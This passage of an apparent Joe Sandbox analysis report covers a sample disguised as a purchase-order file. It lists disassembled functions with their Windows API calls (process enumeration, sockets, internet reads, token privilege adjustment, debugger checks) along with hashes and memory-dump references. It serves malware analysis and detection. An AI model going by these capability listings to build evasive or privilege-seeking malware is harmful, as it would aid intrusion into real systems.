Instruction Fuzzy Hash: 6921E131A012009FCB10EF64C985A6EB3A9AF48315F10856EED16B73D2CB38AD498B59

Function 00446532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00446554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00446564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00446583
__wsplitpath.LIBCMT ref: 004465A7
_wcscat.LIBCMT ref: 004465BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 004465F9

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 2d41c09dd81c2ae839535a0934c8672d61f7edfe20a8949431cfe49a907b3b17
Instruction ID: 5a10ba3f14c39411ad8ad50115d45b01add9c21422253e8f096218853a032e33
Opcode Fuzzy Hash: 2d41c09dd81c2ae839535a0934c8672d61f7edfe20a8949431cfe49a907b3b17
Instruction Fuzzy Hash: 7B219571900218BBEB10ABA4DC88FDEB7BCAB05300F5004AAE505D3241DB759F85CB65

Function 004413CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 004413DC

Strings

|, xrefs: 0044140C
,2K, xrefs: 004416B1
<2K, xrefs: 004416FA
(, xrefs: 00441422

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: lstrlen
String ID: ($,2K$<2K$|
API String ID: 1659193697-2182472957
Opcode ID: 524c958fd482d931795d13b601762ad0f23e08667b808a05e84820537726d62a
Instruction ID: b3f271005b524aebf8f91158433a8eea4ac4193e129ed65323c4eb9f1a4cf8f1
Opcode Fuzzy Hash: 524c958fd482d931795d13b601762ad0f23e08667b808a05e84820537726d62a
Instruction Fuzzy Hash: FF323675A007059FD728DF29C4809AAB7F0FF48310B15C56EE59ADB3A2E774E981CB48

Function 0045923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0045A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0045A84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00459296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 004592B9

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 38a9d122883346d3f8cb65db6244ab408325e3e1faa11902ac3d89c5ea658cdf
Instruction ID: f31afdfd231ffbce65f4c59d6c83f29495bd5957bcfb5fbfa73d0d0b248d16ca
Opcode Fuzzy Hash: 38a9d122883346d3f8cb65db6244ab408325e3e1faa11902ac3d89c5ea658cdf
Instruction Fuzzy Hash: 8641F570600104AFDB10AB24C842E7E77EDEF08328F04445EF956A73D3DB789D418B99

Function 0044EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0044EB8A
_wcscmp.LIBCMT ref: 0044EBBA
_wcscmp.LIBCMT ref: 0044EBCF
FindNextFileW.KERNEL32(00000000,?), ref: 0044EBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0044EC0E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 7decc0964aa9a0c18d0d93d071e471d8afd33c0129de16156793592e0011829b
Instruction ID: f4d4502bd19f39e4eae8a827b2e93a7102bde83d7ab60724816fa37c5e4c86a1
Opcode Fuzzy Hash: 7decc0964aa9a0c18d0d93d071e471d8afd33c0129de16156793592e0011829b
Instruction Fuzzy Hash: 9041DF306006019FD708DF29C4D1A9AB3E4FF49324F10456EEA5A8B3A1DB39B985CB99

Function 00468111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00468160
IsWindowEnabled.USER32 ref: 0046816E
GetForegroundWindow.USER32(?,?,00000001), ref: 0046817B
IsIconic.USER32 ref: 00468189
IsZoomed.USER32 ref: 00468197

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: dbfed87c38ee92bf59b292af6f5fadc4ca6e903502444fd297db996fb690681f
Instruction ID: b914647029d33102a7cfa3aa289e3b8462c5c21d78575f5ca8fb078c54b4ff5d
Opcode Fuzzy Hash: dbfed87c38ee92bf59b292af6f5fadc4ca6e903502444fd297db996fb690681f
Instruction Fuzzy Hash: 0711E2317011146BE7212F26DC44EAF7799EF46720B04052FF849D3281EF78980386AE

Function 0041E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0041E014,75920AE0,0041DEF1,0049DC38,?,?), ref: 0041E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0041E03E

Strings

kernel32.dll, xrefs: 0041E027
GetNativeSystemInfo, xrefs: 0041E038

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: d4bcc8df34a69c75c0e0aef847fce7452e4d83df1b9fa05b59668c201de80aca
Instruction ID: d3a2d7f9251202634d31430f40abaa6068e993e0ea93885ba20427a44fa0b13a
Opcode Fuzzy Hash: d4bcc8df34a69c75c0e0aef847fce7452e4d83df1b9fa05b59668c201de80aca
Instruction Fuzzy Hash: 7BD05E348007229EC7215B62E9087977BD4AF04700F28482FE88192290D6F8D8808768

Function 0041B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 0041B22F

Part of subcall function 0041B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0041B5A5

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 7cf0e01d325c05872215fadf7fd1876a518e877bd8c73a3ee908c1b70c179c08
Instruction ID: 2271108539b8a3bcad80f9fb504b99785085641c9eb99831aee7754bc93f6997
Opcode Fuzzy Hash: 7cf0e01d325c05872215fadf7fd1876a518e877bd8c73a3ee908c1b70c179c08
Instruction Fuzzy Hash: FBA14C70114105BAD7246B2B9C4CDFF295CEB4A348B14829FF845D6292DB3C9C8692FF

Function 00454EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004543BF,00000000), ref: 00454FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00454FD2

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: b15ee36bd8f8c1997b8993369eb904f73e6a1371bf2522d5b0c7af915fedb5b3
Instruction ID: fc2494c5d1090c68671fb56a484849f12dd1ab69f199119c895c0e360fce0958
Opcode Fuzzy Hash: b15ee36bd8f8c1997b8993369eb904f73e6a1371bf2522d5b0c7af915fedb5b3
Instruction Fuzzy Hash: 5541FA72604205BFEB10DE85DC81EBF77BCEB8071EF10402FFA0566182D6799E89D668

Function 00AF1361 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AF1459
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AF1463
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 00AF1470

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 13c39c8bb375b522b9e24c2fbfea5b86dfdc7851a990d1386451ba74fc9608a3
Instruction ID: 5435b5f0454b8e385174f64a97a59359c0a3159664e5e6eb2b6d98c877a76e04
Opcode Fuzzy Hash: 13c39c8bb375b522b9e24c2fbfea5b86dfdc7851a990d1386451ba74fc9608a3
Instruction Fuzzy Hash: 6C31D5B590122C9BCB21DFA8D9887DDBBB8AF08310F5041DAF51CA7250EB309B858F45

Function 004077B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407921

Strings

\QK, xrefs: 00481028

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _memmove
String ID: \QK
API String ID: 4104443479-3628726987
Opcode ID: 1c3005cb5f0da8ad46b7d66dd3d69215c08c54ff01ccddff8815d6f2f27610d0
Instruction ID: 87b044c4d6a9c987ae79e4dbe16587d7b3263cda5fc705f545ac5aa4043bf09a
Opcode Fuzzy Hash: 1c3005cb5f0da8ad46b7d66dd3d69215c08c54ff01ccddff8815d6f2f27610d0
Instruction Fuzzy Hash: E1A26D70E04219CFDB24DF58C4806ADB7B1FF48314F2581AAD859AB391D778AE82CF59

Function 0044E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0044E20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0044E267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0044E2B4

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: aafbfce44185f70870d8afe07bf37bb2e422d67a6981e374a3d90d68d9f72eff
Instruction ID: fcb039aee163e110a326b73cd7f822dd4e4f4f3e0c392ce8ae1e703b4088fde6
Opcode Fuzzy Hash: aafbfce44185f70870d8afe07bf37bb2e422d67a6981e374a3d90d68d9f72eff
Instruction Fuzzy Hash: 46219D35A00118EFDB00EFA5D884EEDBBB8FF48314F0484AAE905E7391DB359905CB58

Function 0043B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0041F4EA: std::exception::exception.LIBCMT ref: 0041F51E
Part of subcall function 0041F4EA: __CxxThrowException@8.LIBCMT ref: 0041F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0043B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0043B1AD
GetLastError.KERNEL32 ref: 0043B1BA

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: d28d35a6c3fdcac1336cde914a0e4f9c973a41ee16441fe454c374b171a81ab2
Instruction ID: d34e02cad222c35508b3879b7c877537743fe1e9ff263f18776d04d4c75f896d
Opcode Fuzzy Hash: d28d35a6c3fdcac1336cde914a0e4f9c973a41ee16441fe454c374b171a81ab2
Instruction Fuzzy Hash: E611C1B1900204AFE7189F54DCC5D6BB7BDFB48354B20892EF45697241DB74FC428B64

Function 00446606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00446623
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00446664
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0044666F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: b8fd0c6e3683981e9efe52009cb6122e78433f0100f3abba2d1de88c949d02f3
Instruction ID: 1683307e1cd0e27eae8824ccb2fe6fa6d8dcf54692714181804254f96fd723f1
Opcode Fuzzy Hash: b8fd0c6e3683981e9efe52009cb6122e78433f0100f3abba2d1de88c949d02f3
Instruction Fuzzy Hash: 7E115271E01228BFEB109F98DC44BAF7BBCEB45710F114566F900E6290D7B05E018BA5

Function 004471FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00447223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0044723A
FreeSid.ADVAPI32(?), ref: 0044724A

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: c31be835109406b49b1e5b9f6e5b02849ad6eb7177ad8e108ba26c0d5b9f8f92
Instruction ID: 57aeaf038d2452313bcdb42708262a1761e9db82bc135c3fee38054b2013e197
Opcode Fuzzy Hash: c31be835109406b49b1e5b9f6e5b02849ad6eb7177ad8e108ba26c0d5b9f8f92
Instruction Fuzzy Hash: 3FF01D76E05309BFDF04DFE4DD89AEEBBB8FF09205F504869A602E21D1E3749A449B14

Function 00AF3F3D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00AF3F13,00000003,00B0DE80,0000000C,00AF403D,00000003,00000002,00000000,?,00AF2038,00000003), ref: 00AF3F5E
TerminateProcess.KERNEL32(00000000,?,00AF3F13,00000003,00B0DE80,0000000C,00AF403D,00000003,00000002,00000000,?,00AF2038,00000003), ref: 00AF3F65
ExitProcess.KERNEL32 ref: 00AF3F77

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 99eb2e9a69b9efde770805638817cec2eee40622dd8b9a92b0c912a1b31f1f85
Instruction ID: b4d5b0d7a01a684f82e8b60c88ce236abec20dd9d05ce19a1c66ba28494584a1
Opcode Fuzzy Hash: 99eb2e9a69b9efde770805638817cec2eee40622dd8b9a92b0c912a1b31f1f85
Instruction Fuzzy Hash: F2E0467240490CABCF01AFE9DD08AB83B79EB54381F014018FA498A222CB35DE43CB85

Function 0044F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0044F599
FindClose.KERNEL32(00000000), ref: 0044F5C9

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f5ed6886b2520a8fc29f1761c1adbfca9a54a527dae0a705951b44cad1029618
Instruction ID: f1cd61f13b4ef61f2258d90b24d8a70c52a44234eaa919de3b45e9d4c70e834c
Opcode Fuzzy Hash: f5ed6886b2520a8fc29f1761c1adbfca9a54a527dae0a705951b44cad1029618
Instruction Fuzzy Hash: BF11C4316002009FD700EF29D849A2EB3E9FF84324F00892EF9A5D73D1DB74AD058B89

Function 0044CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0045BE6A,?,?,00000000,?), ref: 0044CEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0045BE6A,?,?,00000000,?), ref: 0044CEB9

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

